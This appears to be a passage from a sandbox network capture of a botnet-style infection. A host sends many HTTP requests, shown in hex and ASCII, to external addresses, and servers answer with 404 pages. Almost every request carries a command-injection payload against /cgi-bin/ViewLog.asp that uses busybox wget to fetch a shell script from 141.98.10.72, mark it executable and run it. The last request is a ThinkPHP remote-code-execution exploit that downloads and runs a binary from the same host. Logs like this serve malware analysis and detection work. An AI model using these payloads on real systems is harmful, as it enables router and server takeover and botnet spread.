77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
777	192.168.2.15	38238	62.225.47.205	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.780132055 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:37.989213943 CET	937	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 741 Date: Wed, 14 Feb 2024 08:30:37 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 35 34 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> /cgi-bin/ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.54 (Debian)</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
778	192.168.2.15	33434	94.122.193.154	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.823518991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
779	192.168.2.15	38936	94.123.138.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.823964119 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
780	192.168.2.15	54600	94.121.98.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.827693939 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
781	192.168.2.15	52414	94.120.48.55	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.829168081 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
782	192.168.2.15	48132	85.255.168.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:37.829503059 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:38.077711105 CET	381	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 10:04:38 GMT Server: web Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
783	192.168.2.15	41252	31.136.5.68	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:38.523827076 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.192192078 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:40.536115885 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.352257967 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:48.727930069 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:59.479506016 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.263060093 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:32:05.269928932 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
784	192.168.2.15	47058	95.217.148.104	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:38.749949932 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
785	192.168.2.15	42076	94.121.75.38	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:38.772306919 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
786	192.168.2.15	50340	95.86.118.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:38.776449919 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
787	192.168.2.15	52150	95.140.138.211	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.273483992 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
788	192.168.2.15	33214	94.243.239.105	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.289577007 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
789	192.168.2.15	43022	94.187.101.23	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.299737930 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
790	192.168.2.15	35772	62.192.141.153	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.482158899 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:40.693490028 CET	135	IN	HTTP/1.1 404 Not Found server: owsd content-type: text/html content-length: 38 Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
791	192.168.2.15	33298	94.247.150.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.487742901 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
792	192.168.2.15	41104	85.31.60.191	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.500978947 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
793	192.168.2.15	40366	62.29.44.211	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.538902998 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
794	192.168.2.15	32866	94.120.254.97	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:40.539268017 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
795	192.168.2.15	39634	95.170.66.222	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:41.244570971 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
